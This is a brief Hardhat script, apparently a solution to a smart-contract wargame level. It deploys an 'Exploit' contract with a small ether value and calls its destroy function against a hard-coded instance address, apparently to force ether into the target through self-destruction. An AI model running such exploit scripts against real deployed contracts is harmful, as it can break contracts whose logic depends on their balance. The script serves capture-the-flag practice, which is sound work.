


const main = async () => {

    const instanceAddress = "0x361D28a1671F4eaC8B640Afe3401716cc9297233"
    
    const ExploitFactory = await hre.ethers.getContractFactory("Exploit")
    const exploit = await ExploitFactory.deploy({value: 10})
    await exploit.deployed()

    const tx = await exploit.destroy(instanceAddress)
    await tx.wait(1)
    console.log("exploit finished")
}




main()
.then(() => process.exit(0))
.catch((error) => {
  console.error(error);
  process.exit(1);
});